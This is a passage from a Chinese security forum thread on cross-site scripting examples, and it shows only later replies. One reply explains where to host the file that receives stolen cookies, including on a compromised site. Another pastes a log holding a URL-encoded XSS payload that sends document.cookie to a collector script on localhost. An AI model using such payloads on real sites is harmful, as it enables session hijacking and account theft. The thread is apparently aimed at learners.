首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]跨站脚本攻击实例解析
发表于: 2010-11-4 21:54 57698

[原创]跨站脚本攻击实例解析

riusksk 活跃值
41
2010-11-4 21:54
57698

查看主题内容

收藏
免费 2
支持
分享
最新回复 (82)
wubudomain
雪    币: 2246
活跃值: (46)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
76
这个很犀利。。
2013-9-4 16:57
0
黑色舞曲
雪    币: 1428
活跃值: (707)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
77
你的xss代码是在web端,通过XSS窃取到的cookie要发送给攻击者,那个接受cookie的文件随意放,放自己的网站、放你拿下的网站,或者自己在本地搭建一个环境都行,目的就是你能够收到偷来的信息啊,不难理解吧
2013-9-22 08:47
0
whaixrst
雪    币: 7
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
78
3年后来膜拜,正在学习跨站这块
2013-9-24 15:32
0
whaixrst
雪    币: 7
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
79
我使用第一个后,为什么获取不了cookie?那个txt文本里的内容
IP: 127.0.0.1
Date and Time: 2013-09-27 7:51:17
User Agent:Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Referer: http://localhost/app1/test.php?key=%3cscript%3edocument.write(%27%3cimg+src%3d%22http%3a%2f%2flocalhost%2ftest.php%3fcookie%3d%27%2bdocument.cookie%2b%27%22+width%3d0+height%3d0+border%3d0+%2f%3e%27)%3b%3c%2fscript%3e
Cookie:
cookie后面是空白的
2013-9-27 16:03
0
黑涩火焰
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
80
mark^-^
2013-9-27 16:42
0
孤行有你
雪    币: 255
活跃值: (37)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
81
抱住腿!
2014-7-28 11:37
0
ilovehk
雪    币: 202
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
82
太精彩了。谢谢,学习啦
2014-8-20 22:59
0
Rossssss
雪    币: 220
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
83
mark
2020-2-10 21:02
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//